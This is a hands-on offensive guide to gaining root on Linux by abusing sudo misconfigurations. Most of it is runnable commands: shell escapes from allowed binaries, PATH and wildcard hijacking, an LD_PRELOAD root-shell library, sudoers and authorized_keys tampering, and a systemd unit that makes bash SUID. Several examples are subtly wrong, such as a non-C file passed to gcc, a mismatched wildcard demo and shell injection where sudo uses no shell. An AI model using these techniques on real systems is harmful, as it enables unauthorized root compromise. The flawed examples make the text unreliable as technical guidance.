Sudo misconfigurations

Understanding Sudo Exploitation

What Makes Sudo Vulnerable

Sudo (substitute user do) allows users to execute commands as other users, typically root. Misconfigurations in sudo rules create direct privilege escalation paths by allowing users to run commands or programs with elevated privileges that can be abused to gain shell access or modify system files.

The Attack Principle: Exploit sudo rules that:

• Allow execution of programs that can spawn shells

• Permit command execution with wildcards or path manipulation

• Grant access to editors, interpreters, or system utilities

• Have overly permissive NOPASSWD configurations

• Use environment variable preservation that can be exploited

Why This Works: Sudo runs commands with the target user's privileges (usually root), so any command that can be manipulated to execute arbitrary code provides immediate privilege escalation.

Sudo Configuration Discovery

Basic Sudo Enumeration

Current User Sudo Rights:

# Check current user's sudo permissions
sudo -l

# Check specific user sudo permissions
sudo -l -U username

# Check without password prompt (if NOPASSWD configured)
sudo -n -l 2>/dev/null

# Test if user can run sudo without password
sudo -n true 2>/dev/null && echo "Passwordless sudo available"

Sudo Configuration Files:

# Main sudo configuration
cat /etc/sudoers

# Additional sudo configuration files
find /etc/sudoers.d/ -type f -exec cat {} \; 2>/dev/null
ls -la /etc/sudoers.d/

# Check for backup or temporary sudoers files
find /etc -name "*sudo*" -type f 2>/dev/null
find /tmp -name "*sudo*" -type f 2>/dev/null

Sudo Version and Capabilities:

# Check sudo version for known vulnerabilities
sudo --version
sudo -V

# Check for interesting sudo features
sudo --help | grep -E "(preserve|env|edit)"

Binary Exploitation via Sudo

Understanding Binary Exploitation Patterns

As covered in the SUID/SGID section, certain binaries have inherent functionality that can be abused for privilege escalation. The same exploitation principles apply to sudo-allowed binaries - if a binary can spawn shells, execute commands, or manipulate files when run as SUID, it can do the same when executed via sudo.

Key Concept: The exploitation techniques for sudo-allowed binaries mirror those used for SUID binaries. The difference is the execution method (sudo vs SUID bit), but the underlying abuse mechanisms remain identical.

Example Binary Exploitation via Sudo:

# If sudo allows vim (same technique as SUID vim)
sudo vim
# In vim, type: :!/bin/bash

# If sudo allows python (same technique as SUID python)
sudo python -c 'import os; os.system("/bin/bash")'

# If sudo allows find (same technique as SUID find)
sudo find /etc -name "passwd" -exec /bin/bash \;

For detailed binary exploitation techniques, refer to the comprehensive examples in the SUID/SGID Binary Exploitation section.

---

Advanced Sudo Exploitation Techniques

Why Multiple Attack Methods Exist

Different sudo configurations require different exploitation approaches. Understanding when and why to use each method is crucial:

Path Manipulation - Used when sudo rules don't specify absolute paths

• When: Sudo rule like user ALL=(ALL) ls instead of /bin/ls

• Why: You can create malicious binaries with same names in your PATH

• Example: Create /tmp/ls that spawns shell, modify PATH, run sudo ls

Wildcard Exploitation - Used when sudo rules contain wildcards or glob patterns

• When: Sudo rule like user ALL=(ALL) /bin/cp /home/user/* /root/

• Why: Wildcards expand to include malicious filenames you create

• Example: Create files named --preserve=mode to inject cp flags

Environment Variable Exploitation - Used when sudo preserves dangerous environment variables

• When: Sudo config has env_keep for LD_PRELOAD, LD_LIBRARY_PATH, etc.

• Why: You can inject malicious libraries or modify program behavior

• Example: LD_PRELOAD malicious library that spawns shell on program start

Wildcard and Path Exploitation

Command with Wildcards:

# Why this works: Wildcards expand to include filenames you control
# When: Sudo rule like "user ALL=(ALL) /bin/cp /home/user/* /root/"

# If sudo rule uses wildcards like: user ALL=(ALL) /bin/cp /home/user/* /root/
# Create malicious files with special names that become command flags
touch '/tmp/file1'
touch '/tmp/--preserve=mode'    # This becomes a flag to cp command
touch '/tmp/--preserve=ownership'
touch '/tmp/--backup=simple'
touch '/tmp/--suffix=.bak'

# When wildcard expands, it includes your malicious flags
sudo /bin/cp /home/user/* /root/
# Becomes: sudo /bin/cp /home/user/file1 /home/user/--preserve=mode /home/user/--backup=simple /root/

Path Manipulation:

# Why this works: Sudo rule doesn't specify absolute path to binary
# When: Sudo rule like "user ALL=(ALL) ls" instead of "/bin/ls"

echo '#!/bin/bash' > /tmp/ls
echo '/bin/bash' >> /tmp/ls
chmod +x /tmp/ls

export PATH=/tmp:$PATH
sudo ls  # Executes /tmp/ls instead of /bin/ls because PATH is checked first

Relative Path Exploitation:

# If sudo allows relative paths
ln -s /bin/bash ./ls
sudo ./ls

# Or create malicious script
echo '#!/bin/bash' > ./allowed_script
echo '/bin/bash' >> ./allowed_script
chmod +x ./allowed_script
sudo ./allowed_script

Environment Variable Exploitation

Why Environment Variables Matter: Some sudo configurations preserve environment variables that can be manipulated to change program behavior or inject malicious code.

LD_PRELOAD Exploitation:

# Why this works: LD_PRELOAD forces programs to load your library first
# When: sudo preserves LD_PRELOAD (check with: sudo -l | grep LD_PRELOAD)

# Check if LD_PRELOAD is preserved
sudo -l | grep -E "(env_keep|LD_PRELOAD)"

# Create malicious library that spawns shell when any function is called
cat > /tmp/shell.c << 'EOF'
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setuid(0);
    system("/bin/bash");
}
EOF

gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles

# Execute any allowed program with LD_PRELOAD - it will load your library and spawn shell
sudo LD_PRELOAD=/tmp/shell.so [any_allowed_program]

LD_LIBRARY_PATH Exploitation:

# Check if LD_LIBRARY_PATH is preserved
sudo -l | grep LD_LIBRARY_PATH

# Create malicious library directory
mkdir /tmp/lib
cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/lib/

# Modify library or create wrapper library
# Then execute with modified library path
sudo LD_LIBRARY_PATH=/tmp/lib [allowed_program]

Other Environment Variables:

# Check what environment variables are preserved
sudo -l | grep env_keep

# Exploit preserved variables
sudo PYTHONPATH=/tmp python -c 'import malicious'
sudo PERL5LIB=/tmp perl script.pl

Editor and Configuration File Exploitation

sudoedit Exploitation:

# If sudoedit is allowed for specific files
EDITOR='vim -c ":!/bin/bash"' sudoedit /etc/hosts
EDITOR='nano -T 4 -c "reset; bash 1>&0 2>&0"' sudoedit /etc/hosts

# Alternative sudoedit techniques
VISUAL='vim -c ":!/bin/bash"' sudoedit /etc/hosts

Configuration File Overwrite:

# If sudo allows editing configuration files
sudo vim /etc/sudoers
# Add: username ALL=(ALL) NOPASSWD: ALL

sudo nano /etc/passwd
# Modify root entry or add new root user

sudo vi /root/.ssh/authorized_keys
# Add your SSH public key

---

Specific Sudo Rule Exploitation

Common Dangerous Sudo Configurations

ALL Commands (Worst Case):

# If sudoers contains: user ALL=(ALL) ALL
sudo su -
sudo bash
sudo /bin/bash

NOPASSWD Configurations:

# If NOPASSWD is configured for specific commands
# Check with: sudo -l

# Examples of dangerous NOPASSWD rules:
sudo vim /etc/passwd     # If vim NOPASSWD
sudo python script.py    # If python NOPASSWD
sudo /bin/bash          # If bash NOPASSWD (obvious)

Service Management Commands:

# If sudo allows systemctl
sudo systemctl status
# Type: !/bin/bash

# Create malicious service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > /tmp/malicious.service

sudo systemctl link /tmp/malicious.service
sudo systemctl enable --now malicious.service

Package Management:

# If sudo allows apt/yum/dnf
sudo apt update && sudo apt install vim
sudo vim  # Now escalate via vim

# Using package manager hooks
echo 'exec /bin/bash' > /tmp/hook
sudo apt -o DPkg::Pre-Install-Pkgs=/tmp/hook install vim

# Yum/DNF exploitation
sudo yum install vim -y
sudo vim  # Escalate via installed editor

Application-Specific Exploitations

Database Sudo Access:

# If sudo allows mysql
sudo mysql -e '\! /bin/bash'
sudo mysql
mysql> \! bash

# PostgreSQL
sudo psql
postgres=# \! bash

Web Server Commands:

# If sudo allows apache2/nginx control
sudo apache2ctl -f /dev/stdin <<<'LoadModule rewrite_module /tmp/malicious.so'

# Using nginx with malicious config
echo 'daemon off; master_process off;' > /tmp/nginx.conf
sudo nginx -c /tmp/nginx.conf

Compiler Access:

# If sudo allows gcc/make
echo 'exec /bin/bash' > /tmp/shell.c
sudo gcc /tmp/shell.c -o /tmp/shell
/tmp/shell

# Using make
echo 'all:; /bin/bash' > /tmp/Makefile
sudo make -f /tmp/Makefile

---

Sudo Rule Bypasses

Command Injection in Sudo Rules

Injection through Arguments:

# If sudo rule allows: /bin/cat /var/log/*.log
# Try to inject commands
sudo /bin/cat '/var/log/../etc/passwd'
sudo /bin/cat '/var/log/something.log; /bin/bash; echo .log'

Shell Metacharacter Exploitation:

# If sudo allows commands with user input
sudo /bin/bash -c "echo user_input"
# Inject: user_input; /bin/bash

# Command substitution
sudo /bin/echo $(whoami)
# Try: sudo /bin/echo $(/bin/bash)

Argument Confusion:

# If sudo rule specifies exact arguments
# user ALL=(ALL) /usr/bin/find /home -name *.txt

# Try variations:
sudo /usr/bin/find /home -name "*.txt" -exec /bin/bash \;
sudo /usr/bin/find /home -name '*.txt' -exec sh \;

Script and Wrapper Exploitation

Shell Script Analysis:

# If sudo allows execution of shell scripts
cat /path/to/allowed_script.sh

# Look for:
# - Relative paths in the script
# - User input handling
# - Environment variable usage
# - System calls without full paths

Script Modification (if writable):

# If the allowed script is writable
echo '/bin/bash' >> /path/to/allowed_script.sh
sudo /path/to/allowed_script.sh

Symbolic Link Attacks:

# If sudo allows specific file operations
ln -s /etc/passwd /tmp/allowed_file
sudo vim /tmp/allowed_file  # Actually edits /etc/passwd

---

Time-Based and Race Condition Exploits

Sudo Timestamp Exploitation

Timestamp File Analysis:

# Check sudo timestamp files
ls -la /var/run/sudo/ts/
ls -la /var/lib/sudo/

# If timestamp files are accessible, check timestamps
stat /var/run/sudo/ts/username

Session Hijacking:

# If multiple sessions exist with same user
# Check if sudo credentials are cached
sudo -n true 2>/dev/null && echo "Sudo cached, no password needed"

# Use cached credentials
sudo -n /bin/bash

Key Operational Considerations

Success Indicators

• Sudo command executes without password prompt when expected

• Shell access gained with elevated privileges (check with id)

• File access to previously restricted files

• Command execution as root or target user

Common Failure Points

• Password required for sudo commands

• Restrictive sudo rules with no exploitable commands

• Commands in sudo rules don't exist or aren't exploitable

• Environment variables are properly sanitized

Operational Notes

• Always check sudo -l first before attempting exploitation

• Test NOPASSWD configurations before assuming password is needed

• Verify effective UID after successful exploitation

• Understand sudo rule syntax to identify bypasses and edge cases

Sudo misconfigurations represent one of the most common and reliable Linux privilege escalation vectors, with numerous exploitation paths available through both intended functionality and configuration bypasses.